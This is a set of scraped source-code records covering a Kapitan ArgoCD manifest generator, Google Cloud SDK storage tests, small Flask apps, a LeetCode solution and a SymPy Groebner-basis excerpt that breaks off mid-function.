isinstance(val, str):\n self._strings[self._build_key(key, prefix)] = val\n continue\n keyset = set(val.keys()) - {'_'}\n if len(self._re_nkey.findall(','.join(keyset))) == len(keyset):\n self._groups[self._build_key(key, prefix)] = GroupData(val)\n else:\n self._load_data(val, self._build_key(key, prefix))\n\n def _ensure_updated_sources(self):\n for source in self._sources:\n mtime = source['path'].stat().st_mtime\n if mtime != source['mtime']:\n source['mtime'] = mtime\n self._load_source(source['path'], source['prefix'])\n\n def _get_reload(self, text: str) -> Tuple[str, Dict[int, str]]:\n self._ensure_updated_sources()\n return self._strings.get(text, text), self._groups.get(text, {})\n\n def _get_static(self, text: str) -> Tuple[str, Dict[int, str]]:\n return self._strings.get(text, text), self._groups.get(text, {})\n","sub_path":"severus/language.py","file_name":"language.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"283628913","text":"import base64\nimport hashlib\nimport os\n\nfrom kapitan.cached import args\nfrom kapitan.inputs.kadet import BaseObj, inventory\nfrom kapitan.utils import render_jinja2_file\n\nsearch_paths = args.get(\"search_paths\")\n\nfrom . import k8s\n\n\ndef j2(filename, ctx):\n return render_jinja2_file(filename, ctx, search_paths=search_paths)\n\n\ninv = inventory(lazy=True)\n\n\ndef merge(source, destination):\n for key, value in source.items():\n if isinstance(value, dict):\n node = destination.setdefault(key, value)\n if node is None:\n destination[key] = value\n else:\n merge(value, node)\n else:\n destination[key] = destination.setdefault(key, value)\n\n return destination\n\n\nclass ArgoCDAppProject(k8s.Base):\n def new(self):\n self.need(\"name\")\n self.kwargs.apiVersion = \"argoproj.io/v1alpha1\"\n self.kwargs.kind = \"AppProject\"\n\n # Add a this finalizer ONLY if you want these to cascade delete\n self.kwargs.finalizers = list(\"resources-finalizer.argocd.argoproj.io\")\n super().new()\n\n def body(self):\n super().body()\n\n # You'll usually want to add your resources to the argocd namespace.\n self.add_namespace(inv.parameters.argocd_namespace)\n\n argocd_project = self.kwargs.argocd_project\n\n self.add_annotations(argocd_project.get(\"annotations\", {}))\n self.add_labels(argocd_project.get(\"labels\", {}))\n\n # Allow manifests to deploy from any Git repos\n if argocd_project.source_repos:\n self.root.spec.sourceRepos = argocd_project.source_repos\n\n # Only permit applications to deploy to the namespace in the same cluster\n if argocd_project.destinations:\n self.root.spec.destinations = argocd_project.destinations\n\n # Deny all cluster-scoped resources from being created, except for Namespace\n if argocd_project.cluster_resource_whitelist:\n self.root.spec.clusterResourceWhitelist = (\n argocd_project.cluster_resource_whitelist\n )\n\n # Allow all namespaced-scoped resources to be created, except for ResourceQuota, LimitRange, NetworkPolicy\n if argocd_project.namespace_resource_blacklist:\n self.root.spec.namespaceResourceBlacklist = (\n argocd_project.namespace_resource_blacklist\n )\n\n # Deny all namespaced-scoped resources from being created, except for Deployment and StatefulSet\n if argocd_project.namespace_resource_whitelist:\n self.root.spec.namespaceResourceWhitelist = (\n argocd_project.namespace_resource_whitelist\n )\n\n # Enables namespace orphaned resource monitoring.\n if argocd_project.orphaned_resources:\n self.root.spec.orphanedResources = argocd_project.orphaned_resources\n\n # Roles\n if argocd_project.roles:\n self.root.spec.roles = argocd_project.roles\n\n\nclass ArgoCDApplication(k8s.Base):\n def new(self):\n self.need(\"name\")\n self.kwargs.apiVersion = \"argoproj.io/v1alpha1\"\n self.kwargs.kind = \"Application\"\n\n # Add a this finalizer ONLY if you want these to cascade delete\n\n # self.kwargs.finalizers = list('resources-finalizer.argocd.argoproj.io')\n super().new()\n\n def body(self):\n super().body()\n\n # You'll usually want to add your resources to the argocd namespace.\n self.add_namespace(inv.parameters.argocd_namespace)\n\n argocd_application = self.kwargs.argocd_application\n\n self.add_annotations(argocd_application.get(\"annotations\", {}))\n self.add_labels(argocd_application.get(\"labels\", {}))\n\n # The project the argocd_application belongs to.\n self.root.spec.project = argocd_application.project\n\n # The destination in which Namespace the application should be deployed\n self.root.spec.destination = argocd_application.destination\n\n # Source of the application manifests\n if argocd_application.source:\n self.root.spec.source = argocd_application.source\n\n # Sync policy\n if argocd_application.sync_policy:\n self.root.spec.syncPolicy = argocd_application.sync_policy\n\n # Ignore differences at the specified json pointers\n if argocd_application.ignore_differences:\n self.root.spec.ignoreDifferences = argocd_application.ignore_differences\n\n\n# The following classes are required to generate Secrets + ConfigMaps\n# TODO: Imported from k8s-generator\nclass SharedConfig:\n \"\"\"Shared class to use for both Secrets and ConfigMaps classes.\n\n contain anything needed by both classes, so that their behavious is basically the same.\n Each subclass will then implement its own way of adding the data depending on their implementation.\n \"\"\"\n\n @staticmethod\n def encode_string(unencoded_string):\n return base64.b64encode(unencoded_string.encode(\"ascii\")).decode(\"ascii\")\n\n def setup_metadata(self):\n self.add_namespace(inv.parameters.argocd_namespace)\n self.add_annotations(self.config.annotations)\n self.add_labels(self.config.labels)\n\n self.items = self.config[\"items\"]\n try:\n if isinstance(self, ConfigMap):\n globals = (\n inv.parameters.generators.manifest.default_config.globals.config_maps\n )\n else:\n globals = (\n inv.parameters.generators.manifest.default_config.globals.secrets\n )\n self.add_annotations(globals.get(\"annotations\", {}))\n self.add_labels(globals.get(\"labels\", {}))\n except AttributeError:\n pass\n\n self.versioning(self.config.get(\"versioned\", False))\n\n def add_directory(self, directory, encode=False):\n stringdata = inv.parameters.get(\"use_tesoro\", False)\n if directory and os.path.isdir(directory):\n for filename in os.listdir(directory):\n with open(f\"{directory}/{filename}\", \"r\") as f:\n file_content = f.read()\n self.add_item(\n filename,\n file_content,\n request_encode=encode,\n stringdata=stringdata,\n )\n\n def add_data(self, data):\n stringdata = inv.parameters.get(\"use_tesoro\", False)\n\n for key, spec in data.items():\n encode = spec.get(\"b64_encode\", False)\n\n if \"value\" in spec:\n value = spec.get(\"value\")\n if \"template\" in spec:\n value = j2(spec.template, spec.get(\"values\", {}))\n if \"file\" in spec:\n with open(spec.file, \"r\") as f:\n value = f.read()\n\n self.add_item(key, value, request_encode=encode, stringdata=stringdata)\n\n def add_string_data(self, string_data, encode=False):\n stringdata = True\n\n for key, spec in string_data.items():\n\n if \"value\" in spec:\n value = spec.get(\"value\")\n if \"template\" in spec:\n value = j2(spec.template, spec.get(\"values\", {}))\n if \"file\" in spec:\n with open(spec.file, \"r\") as f:\n value = f.read()\n\n self.add_item(key, value, request_encode=encode, stringdata=stringdata)\n\n def versioning(self, enabled=False):\n if enabled:\n self.hash = hashlib.sha256(str(self.root.to_dict()).encode()).hexdigest()[\n :8\n ]\n self.root.metadata.name += f\"-{self.hash}\"\n\n\n# TODO: Imported from k8s-generator\nclass ConfigMap(k8s.Base, SharedConfig):\n def new(self):\n self.kwargs.apiVersion = \"v1\"\n self.kwargs.kind = \"ConfigMap\"\n super().new()\n\n def body(self):\n super().body()\n\n def add_item(self, key, value, request_encode=False, stringdata=False):\n encode = request_encode\n\n self.root[\"data\"][key] = self.encode_string(value) if encode else value\n\n\n# TODO: Imported from k8s-generator\nclass ComponentConfig(ConfigMap, SharedConfig):\n def new(self):\n super().new()\n self.need(\"config\")\n\n def body(self):\n super().body()\n self.config = self.kwargs.config\n\n self.setup_metadata()\n self.add_data(self.config.data)\n self.add_directory(self.config.directory, encode=False)\n\n\nclass Secret(k8s.Base):\n def new(self):\n self.kwargs.apiVersion = \"v1\"\n self.kwargs.kind = \"Secret\"\n super().new()\n\n def body(self):\n super().body()\n\n def add_item(self, key, value, request_encode=False, stringdata=False):\n encode = not stringdata and request_encode\n field = \"stringData\" if stringdata else \"data\"\n self.root[field][key] = self.encode_string(value) if encode else value\n\n\nclass ComponentSecret(Secret, SharedConfig):\n def new(self):\n super().new()\n self.need(\"config\")\n\n def body(self):\n super().body()\n self.config = self.kwargs.config\n self.root.type = self.config.get(\"type\", \"Opaque\")\n\n self.setup_metadata()\n if self.config.data:\n self.add_data(self.config.data)\n if self.config.string_data:\n self.add_string_data(self.config.string_data)\n self.add_directory(self.config.directory, encode=True)\n\n\n# This function renderes an ArgoCD-AppProject\ndef generate_argocd_appproject(input_params):\n obj = BaseObj()\n bundle = list()\n argocd_projects = inv.parameters.argocd_projects\n for name in argocd_projects.keys():\n argocd_project = ArgoCDAppProject(\n name=name, argocd_project=argocd_projects[name]\n )\n\n obj.root[\"{}-argo-appproject\".format(name)] = argocd_project\n\n return obj\n\n\n# This function renderes an ArgoCD-Application\ndef generate_argocd_application(input_params):\n obj = BaseObj()\n bundle = list()\n argocd_applications = inv.parameters.argocd_applications\n for name in argocd_applications.keys():\n argocd_application = ArgoCDApplication(\n name=name, argocd_application=argocd_applications[name]\n )\n\n obj.root[\"{}-argo-application\".format(name)] = argocd_application\n\n return obj\n\n\n# This function renderes an Shared-ConfigMaps + Secrets\ndef generate_resource_manifests(input_params):\n obj = BaseObj()\n\n for secret_name, secret_spec in inv.parameters.generators.argocd.secrets.items():\n name = secret_spec.get(\"name\", secret_name)\n secret = ComponentSecret(name=name, config=secret_spec)\n obj.root[f\"{name}\"] = secret\n\n for config_name, config_spec in inv.parameters.generators.argocd.configs.items():\n name = config_spec.get(\"name\", config_name)\n config = ComponentConfig(name=name, config=config_spec)\n obj.root[f\"{name}\"] = config\n\n return obj\n\n\n# This function renderes all previous defined functions and returns\ndef generate_manifests(input_params):\n all_manifests = BaseObj()\n\n argocd_project_manifests = generate_argocd_appproject(input_params)\n argocd_application_manifests = generate_argocd_application(input_params)\n resource_manifests = generate_resource_manifests(input_params)\n\n all_manifests.root.update(argocd_project_manifests.root)\n all_manifests.root.update(argocd_application_manifests.root)\n all_manifests.root.update(resource_manifests.root)\n\n return all_manifests\n\n\ndef main(input_params):\n whitelisted_functions = [\"generate_manifests\"]\n function = input_params.get(\"function\", \"generate_manifests\")\n if function in whitelisted_functions:\n return globals()[function](input_params)\n","sub_path":"components/generators/argocd/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":11735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"360408443","text":"# -*- coding: utf-8 -*- #\n# Copyright 2016 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Tests for googlecloudsdk.api_lib.storage.storage_api.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nimport os\nimport re\n\nfrom apitools.base.py.testing import mock as api_mock\n\nfrom googlecloudsdk.api_lib.storage import storage_api\nfrom googlecloudsdk.api_lib.storage import storage_util\nfrom googlecloudsdk.api_lib.util import apis as core_apis\nfrom googlecloudsdk.calliope import exceptions\nfrom tests.lib import sdk_test_base\nfrom tests.lib import test_case\nfrom tests.lib.apitools import http_error\nfrom tests.lib.surface.app import cloud_storage_util\n\n\nclass GetObjectTest(sdk_test_base.SdkBase):\n\n _OBJECT = storage_util.ObjectReference.FromUrl('gs://mybucket/myobject')\n\n def SetUp(self):\n self.apitools_client = api_mock.Client(\n core_apis.GetClientClass('storage', 'v1'))\n self.apitools_client.Mock()\n self.addCleanup(self.apitools_client.Unmock)\n\n self.storage_client = storage_api.StorageClient(self.apitools_client)\n self.storage_msgs = core_apis.GetMessagesModule('storage', 'v1')\n\n def testGetObject(self):\n self.apitools_client.objects.Get.Expect(\n self.storage_msgs.StorageObjectsGetRequest(\n bucket='mybucket', object='myobject'),\n self.storage_msgs.Object(name='myobject'))\n\n self.assertEqual(\n self.storage_client.GetObject(self._OBJECT),\n self.storage_msgs.Object(name='myobject'))\n\n\nclass CopyFileTest(sdk_test_base.SdkBase):\n\n _BUCKET = storage_util.BucketReference.FromBucketUrl('gs://mybucket/')\n\n def SetUp(self):\n self.apitools_client = api_mock.Client(\n core_apis.GetClientClass('storage', 'v1'))\n self.apitools_client.Mock()\n self.addCleanup(self.apitools_client.Unmock)\n\n self.storage_client = storage_api.StorageClient(self.apitools_client)\n self.storage_msgs = core_apis.GetMessagesModule('storage', 'v1')\n\n self.object_name = 'foobar'\n self.target_path = 'mytargetpath'\n self.local_path = self.Touch(\n self.temp_path, self.object_name, contents='somecontentshere')\n self.file_size = os.path.getsize(self.local_path)\n self.insert_request = self.storage_msgs.StorageObjectsInsertRequest(\n bucket=self._BUCKET.bucket,\n name=self.target_path,\n object=self.storage_msgs.Object(size=self.file_size)\n )\n\n def testSuccess(self):\n self.apitools_client.objects.Insert.Expect(\n self.insert_request,\n self.storage_msgs.Object(size=self.file_size)\n )\n self.storage_client.CopyFileToGCS(self._BUCKET,\n self.local_path,\n self.target_path)\n\n def testApiError(self):\n exception = http_error.MakeHttpError()\n\n self.apitools_client.objects.Insert.Expect(\n self.insert_request,\n exception=exception\n )\n\n with self.assertRaisesRegex(\n exceptions.BadFileException,\n r'Could not copy \\[{}\\] to \\[{}\\]. Please retry: Invalid request API '\n r'reason: Invalid request.'.format(\n re.escape(self.local_path), self.target_path)):\n self.storage_client.CopyFileToGCS(self._BUCKET,\n self.local_path,\n self.target_path)\n\n def testSizeMismatch(self):\n self.apitools_client.objects.Insert.Expect(\n self.insert_request,\n # Return an object with a different size.\n self.storage_msgs.Object(size=self.file_size - 1)\n )\n\n with self.assertRaises(exceptions.BadFileException):\n self.storage_client.CopyFileToGCS(self._BUCKET,\n self.local_path,\n self.target_path)\n\n\nclass CopyFileFromGCSTest(sdk_test_base.WithFakeAuth):\n\n _BUCKET = storage_util.BucketReference.FromBucketUrl('gs://mybucket/')\n\n def SetUp(self):\n self.apitools_client = api_mock.Client(\n core_apis.GetClientClass('storage', 'v1'))\n self.apitools_client.Mock()\n self.addCleanup(self.apitools_client.Unmock)\n\n self.storage_client = storage_api.StorageClient(self.apitools_client)\n self.storage_msgs = self.apitools_client.MESSAGES_MODULE\n\n self.object_name = 'foobar'\n self.target_path = 'mytargetpath'\n self.local_path = os.path.join(self.temp_path, self.object_name)\n self.get_request = self.storage_msgs.StorageObjectsGetRequest(\n bucket=self._BUCKET.bucket,\n object=self.target_path)\n\n def testSuccess(self):\n # TODO(b/33202933): There's a TODO in the apitools testing code to add\n # support for upload/download in mocked apitools clients; when that is\n # resolved, test a non-empty mocked file here.\n # Use object() instead of None because when the mock is given None, it uses\n # a real client\n response = object()\n self.apitools_client.objects.Get.Expect(\n self.get_request,\n response)\n self.apitools_client.objects.Get.Expect(\n self.get_request,\n self.storage_msgs.Object(size=0))\n self.storage_client.CopyFileFromGCS(self._BUCKET,\n self.target_path,\n self.local_path)\n\n def testApiError(self):\n exception = http_error.MakeHttpError()\n\n self.apitools_client.objects.Get.Expect(\n self.get_request,\n exception=exception\n )\n\n with self.assertRaises(exceptions.BadFileException):\n self.storage_client.CopyFileFromGCS(self._BUCKET,\n self.target_path,\n self.local_path)\n\n def testSizeMismatch(self):\n # Use object() instead of None because when the mock is given None, it uses\n # a real client\n response = object()\n self.apitools_client.objects.Get.Expect(\n self.get_request,\n response)\n self.apitools_client.objects.Get.Expect(\n self.get_request,\n # Return an object with a different size.\n self.storage_msgs.Object(size=-1))\n\n with self.assertRaises(exceptions.BadFileException):\n self.storage_client.CopyFileFromGCS(self._BUCKET,\n self.target_path,\n self.local_path)\n\n\nclass ReadObjectTest(sdk_test_base.WithFakeAuth):\n\n _OBJECT = storage_util.ObjectReference.FromUrl('gs://bucket/object')\n\n def SetUp(self):\n self.apitools_client = api_mock.Client(\n core_apis.GetClientClass('storage', 'v1'))\n self.apitools_client.Mock()\n self.addCleanup(self.apitools_client.Unmock)\n\n self.storage_client = storage_api.StorageClient(self.apitools_client)\n self.storage_msgs = self.apitools_client.MESSAGES_MODULE\n\n self.get_request = self.storage_msgs.StorageObjectsGetRequest(\n bucket='bucket',\n object='object')\n\n def testSuccess(self):\n # TODO(b/33202933): There's a TODO in the apitools testing code to add\n # support for upload/download in mocked apitools clients; when that is\n # resolved, test a non-empty mocked file here.\n # Use object() instead of None because when the mock is given None, it uses\n # a real client\n response = object()\n self.apitools_client.objects.Get.Expect(\n self.get_request,\n response)\n self.assertEqual(\n self.storage_client.ReadObject(self._OBJECT).read(),\n b'')\n\n def testApiError(self):\n exception = http_error.MakeHttpError()\n\n self.apitools_client.objects.Get.Expect(\n self.get_request,\n exception=exception\n )\n\n with self.assertRaises(exceptions.BadFileException):\n self.storage_client.ReadObject(self._OBJECT)\n\n\nclass ListBucketTest(cloud_storage_util.WithGCSCalls):\n\n _BUCKET_NAME = 'testbucket'\n\n _SHA1_SUMS = {\n 'content': '040f06fd774092478d450774f5ba30c5da78acc8',\n 'content2': '6dc99d4757bcb35eaaf4cd3cb7907189fab8d254',\n 'content3': '32c5ff3108bcea43b1c4826d66f43a3ae570e663'\n }\n\n def SetUp(self):\n self.bucket = storage_util.BucketReference.FromBucketUrl(\n 'gs://{0}/'.format(self._BUCKET_NAME))\n self.storage_client = storage_api.StorageClient()\n\n def testListBucket(self):\n self.ExpectList([('a', 'content'), ('b', 'content'), ('c', 'content2')])\n\n names = set(o.name for o in self.storage_client.ListBucket(self.bucket))\n self.assertEqual(\n names,\n set([self._SHA1_SUMS['content'], self._SHA1_SUMS['content2']]))\n\n def testListBucketMultiplePages(self):\n self.ExpectListMulti([\n [('a', 'content'), ('b', 'content')],\n [('c', 'content2'), ('d', 'content3')]])\n names = set(o.name for o in self.storage_client.ListBucket(self.bucket))\n self.assertEqual(\n names,\n set([self._SHA1_SUMS['content'], self._SHA1_SUMS['content2'],\n self._SHA1_SUMS['content3']]))\n\n\nclass DeleteBucketTest(test_case.TestCase):\n\n _BUCKET_NAME = 'testbucket'\n\n def SetUp(self):\n self.apitools_client = api_mock.Client(\n core_apis.GetClientClass('storage', 'v1'))\n self.apitools_client.Mock()\n self.addCleanup(self.apitools_client.Unmock)\n\n self.storage_client = storage_api.StorageClient(self.apitools_client)\n\n def testDeleteBucket(self):\n bucket = storage_util.BucketReference.FromBucketUrl(\n 'gs://{0}/'.format(self._BUCKET_NAME))\n self.apitools_client.buckets.Delete.Expect(\n self.apitools_client.MESSAGES_MODULE.StorageBucketsDeleteRequest(\n bucket=self._BUCKET_NAME),\n self.apitools_client.MESSAGES_MODULE.StorageBucketsDeleteResponse()\n )\n\n self.storage_client.DeleteBucket(bucket)\n","sub_path":"google-cloud-sdk/lib/tests/unit/api_lib/storage/storage_api_test.py","file_name":"storage_api_test.py","file_ext":"py","file_size_in_byte":10181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"619496392","text":"from random import sample\r\nfrom flask import Flask, render_template\r\nfrom data import *\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef main():\r\n random_tours = {}\r\n rand_list = sample(range(1,tours.__len__()), 6) #генерирую 6 случайных значений без повторений\r\n for i in rand_list:\r\n random_tours[i] = tours[i]\r\n\r\n template_context = dict(title=title, subtitle=subtitle, description=description, tours=random_tours, departures=departures)\r\n output = render_template(\"index.html\", **template_context)\r\n return output\r\n\r\n@app.route('/departures/')\r\ndef show_dep(departure):\r\n\r\n tours_by_dep = {}\r\n for ind, tour in tours.items():\r\n if tour['departure'] == departure:\r\n tours_by_dep[ind] = tour\r\n\r\n tours_count = tours_by_dep.__len__()\r\n\r\n min_price = min(tours_by_dep.values(), key=lambda k: k['price'])['price']\r\n max_price = max(tours_by_dep.values(), key=lambda k: k['price'])['price']\r\n min_days = min(tours_by_dep.values(), key=lambda k: k['nights'])['nights']\r\n max_days = max(tours_by_dep.values(), key=lambda k: k['nights'])['nights']\r\n\r\n template_context = dict(departures=departures, title=title, departure=departure, selected_tours=tours_by_dep, tours_count=tours_count, min_price=min_price, max_price=max_price, min_days=min_days, max_days=max_days)\r\n output = render_template(\"departure.html\", **template_context)\r\n return output\r\n\r\n@app.route('/tours/')\r\ndef show_tour(id):\r\n tour = tours[int(id)]\r\n output = render_template(\"tour.html\", departures=departures, title=title, tour=tour)\r\n return output\r\n\r\nif __name__ == '__main__':\r\n app.run()\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"254221254","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n# author: bigfoolliu\n\n\n\"\"\"\n给定一个正整数 n ,输出外观数列的第 n 项。\n\n「外观数列」是一个整数序列,从数字 1 开始,序列中的每一项都是对前一项的描述。\n\n你可以将其视作是由递归公式定义的数字字符串序列:\n\ncountAndSay(1) = \"1\"\ncountAndSay(n) 是对 countAndSay(n-1) 的描述,然后转换成另一个数字字符串。\n前五项如下:\n\n1. 1\n2. 11\n3. 21\n4. 1211\n5. 111221\n第一项是数字 1 \n描述前一项,这个数是 1 即 “ 一 个 1 ”,记作 \"11\"\n描述前一项,这个数是 11 即 “ 二 个 1 ” ,记作 \"21\"\n描述前一项,这个数是 21 即 “ 一 个 2 + 一 个 1 ” ,记作 \"1211\"\n描述前一项,这个数是 1211 即 “ 一 个 1 + 一 个 2 + 二 个 1 ” ,记作 \"111221\"\n要 描述 一个数字字符串,首先要将字符串分割为 最小 数量的组,每个组都由连续的最多 相同字符 组成。然后对于每个组,先描述字符的数量,然后描述字符,形成一个描述组。要将描述转换为数字字符串,先将每组中的字符数量用数字替换,再将所有描述组连接起来。\n\n例如,数字字符串 \"3322251\" 的描述如下图:\n\n\n \n\n示例 1:\n\n输入:n = 1\n输出:\"1\"\n解释:这是一个基本样例。\n示例 2:\n\n输入:n = 4\n输出:\"1211\"\n解释:\ncountAndSay(1) = \"1\"\ncountAndSay(2) = 读 \"1\" = 一 个 1 = \"11\"\ncountAndSay(3) = 读 \"11\" = 二 个 1 = \"21\"\ncountAndSay(4) = 读 \"21\" = 一 个 2 + 一 个 1 = \"12\" + \"11\" = \"1211\"\n \n\n提示:\n\n1 <= n <= 30\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/count-and-say\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n \n\n提示:\n\n1 <= n <= 30\n\n\n固定的数组的生成:\n- 第一个数字固定为1\n- 后面的数字依次为上一个数字序列的读法\n\n思路:\n\"\"\"\n\nimport doctest\n\n\nclass Solution:\n \"\"\"\n >>> s = Solution()\n >>> s.countAndSay(1)\n '1'\n >>> s.countAndSay(4)\n '1211'\n \"\"\"\n\n def countAndSay(self, n: int) -> str:\n s = \"1\"\n # 第一次遍历一次次的生成\n for j in range(1, n):\n t = s[0]\n tmp = \"\"\n count = 0 # 统计重复出现的数字的个数\n # 用来遍历每一次的数字,统计其读法\n for i in range(0, len(s), 1):\n if t == s[i]:\n count += 1\n else:\n tmp = tmp + str(count) + t\n t = s[i]\n count = 1\n if i == len(s) - 1:\n tmp = tmp + str(count) + t # 将结果合并\n s = tmp\n return s\n\n\nif __name__ == \"__main__\":\n doctest.testmod()\n","sub_path":"algorithms/leetcode/medium/0038_外观数列.py","file_name":"0038_外观数列.py","file_ext":"py","file_size_in_byte":2840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"103194456","text":"from flask import Blueprint, render_template, request, url_for, redirect, flash\nfrom models.user import User\nfrom models.images import Image\nfrom models.following import Following\nfrom flask_login import current_user\n\nfollows_blueprint = Blueprint(\"follows\",\n __name__,\n template_folder='templates')\n\n\n@follows_blueprint.route('/', methods=['POST'])\ndef create(idol_id):\n idol = User.get_or_none(User.id == idol_id)\n\n if not idol:\n flash('No user found with this id')\n return redirect(url_for('sessions.index'))\n # modify this to show homepage HOME in sessions\n\n new_follow = Following(fan_id=current_user.id, idol_id=idol.id)\n\n if not new_follow.save():\n flash('Error in following this user', 'warning')\n return redirect(url_for('users.show', username=idol.username))\n\n else:\n flash(f'You are now following {idol.username}')\n return redirect(url_for('users.show', username=idol.username))\n\n flash('Following request has sent ! Please wait for approval.')\n\n\n@follows_blueprint.route('//delete', methods=['POST'])\ndef delete(idol_id):\n follow = Following.get_or_none(Following.idol_id == idol.id) and (\n Following.fan_id == current_user.id)\n\n if follow.delete_instance():\n flash(f'You have unfollowed {follow.idol.username}')\n return redirect(url_for('users.show', username=follow.idol.username))\n","sub_path":"instagram_web/blueprints/follows/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"492125369","text":"import glob\nimport os\nfrom logs import logs as log\nlogs=log()\ndef qparse(questionlist):\n\tdef checkdicts(checkvar, plugin):\n\t\tplugvals=plugin.values()[0]\n\t\tfor plugdict in plugvals:\n\t\t\tlogs.write(\"Checking dictionary {0}\".format(plugdict),'trying')\n\t\t\tif plugdict.keys()[0]==checkvar:\n\t\t\t\tlogs.write(\"Found {0} dictionary\".format(checkvar), 'success')\n\t\t\t\tcheckval=plugdict.values()[0]\n\t\t\t\treturn checkval\n\tlogs.write(\"Parsing possible plugins\", 'trying')\n\tpriority=open('priority.txt').read().split('\\n')\n\tprioritized=[]\n\tfor plugin in questionlist:\n\t\tplugname=plugin.keys()[0]\n\t\tlogs.write(\"Checking plugin {0}\".format(plugname), 'working')\n\t\tlogs.write(\"Checking to see if the plugin is in the priority list\", 'working')\n\t\tplugname=plugin.keys()[0]\n\t\tfor line in priority:\n\t\t\tname=line.split(':')[1]\n\t\t\tstatus=line.split(':')[0]\n\t\t\tlogs.write('Item {0} in priority list is {1}'.format(status, name), 'working')\n\t\t\tif plugname.lower()==name.lower():\n\t\t\t\tlogs.write(\"Plugin name and priority list item match\", 'success')\n\t\t\t\tprioritized.append({status:plugin})\n\tlogs.write(\"Going through list of prioritized plugins\", 'trying')\n\tlogs.write(prioritized, 'working')\n\tnum=None\n\tfor plugin in prioritized:\n\t\tlogs.write(\"Looking at plugin {0}\".format(plugin), 'working')\n\t\tstatus=plugin.keys()[0]\n\t\tplugname=plugin.values()[0].keys()[0]\n\t\tlogs.write(\"Plugin {0} has priority {1}\".format(plugname,status), 'working')\n\t\tstatus=int(status)\n\t\tif num==None:\n\t\t\tnum=status\n\t\telse:\n\t\t\tif status>> from sympy.abc import x, y\r\n >>> from sympy import groebner\r\n\r\n >>> F = [x**2 - 3*y - x + 1, y**2 - 2*x + y - 1]\r\n >>> G = groebner(F, x, y, order='grlex')\r\n\r\n >>> list(G.fglm('lex'))\r\n [2*x - y**2 - y + 1, y**4 + 2*y**3 - 3*y**2 - 16*y + 7]\r\n >>> list(groebner(F, x, y, order='lex'))\r\n [2*x - y**2 - y + 1, y**4 + 2*y**3 - 3*y**2 - 16*y + 7]\r\n\r\n References\r\n ==========\r\n\r\n J.C. Faugere, P. Gianni, D. Lazard, T. Mora (1994). Efficient\r\n Computation of Zero-dimensional Groebner Bases by Change of\r\n Ordering\r\n\r\n \"\"\"\r\n opt = self._options\r\n\r\n src_order = opt.order\r\n dst_order = monomial_key(order)\r\n\r\n if src_order == dst_order:\r\n return self\r\n\r\n if not self.is_zero_dimensional:\r\n raise NotImplementedError(\"can't convert Groebner bases of ideals with positive dimension\")\r\n\r\n polys = list(self._basis)\r\n domain = opt.domain\r\n\r\n opt = opt.clone(dict(\r\n domain=domain.get_field(),\r\n order=dst_order,\r\n ))\r\n\r\n from sympy.polys.rings import xring\r\n _ring, _ = xring(opt.gens, opt.domain, src_order)\r\n\r\n for i, poly in enumerate(polys):\r\n poly = poly.set_domain(opt.domain).rep.to_dict()\r\n polys[i] = _ring.from_dict(poly)\r\n\r\n G = matrix_fglm(polys, _ring, dst_order)\r\n G = [Poly._from_dict(dict(g), opt) for g in G]\r\n\r\n if not domain.is_Field:\r\n G = [g.clear_denoms(convert=True)[1] for g in G]\r\n opt.domain = domain\r\n\r\n return self._new(G, opt)\r\n\r\n def reduce(self, expr, auto=True):\r\n \"\"\"\r\n Reduces a polynomial modulo a Groebner basis.\r\n\r\n Given a polynomial ``f`` and a set of polynomials ``G = (g_1, ..., g_n)``,\r\n computes a set of quotients ``q = (q_1, ..., q_n)`` and the remainder ``r``\r\n such that ``f = q_1*f_1 + ... + q_n*f_n + r``, where ``r`` vanishes or ``r``\r\n is a completely reduced polynomial with respect to ``G``.\r\n\r\n Examples\r\n ========\r\n\r\n >>> from sympy import groebner, expand\r\n >>> from sympy.abc import x, y\r\n\r\n >>> f = 2*x**4 - x**2 + y**3 + y**2\r\n >>> G = groebner([x**3 - x, y**3 - y])\r\n\r\n >>> G.reduce(f)\r\n ([2*x, 1], x**2 + y**2 + y)\r\n >>> Q, r = _\r\n\r\n >>> expand(sum(q*g for q, g in zip(Q, G)) + r)\r\n 2*x**4 - x**2 + y**3 + y**2\r\n >>> _ == f\r\n True\r\n\r\n \"\"\"\r\n poly = Poly._from_expr(expr, self._options)\r\n polys = [poly] + list(self._basis)\r\n\r\n opt = self._options\r\n domain = opt.domain\r\n\r\n retract = False\r\n\r\n if auto and domain.is_Ring and not domain.is_Field:\r\n opt = opt.clone(dict(domain=domain.get_field()))\r\n retract = True\r\n\r\n from sympy.polys.rings import xring\r\n _ring, _ = xring(opt.gens, opt.domain, opt.order)\r\n\r\n for i, poly in enumerate(polys):\r\n poly = poly.set_domain(opt.domain).rep.to_dict()\r\n polys[i] = _ring.from_dict(poly)\r\n\r\n Q, r = polys[0].div(polys[1:])\r\n\r\n Q = [Poly._from_dict(dict(q), opt) for q in Q]\r\n r = Poly._from_dict(dict(r), opt)\r\n\r\n if retract:\r\n try:\r\n _Q, _r = [q.to_ring() for q in Q], r.to_ring()\r\n except CoercionFailed:\r\n 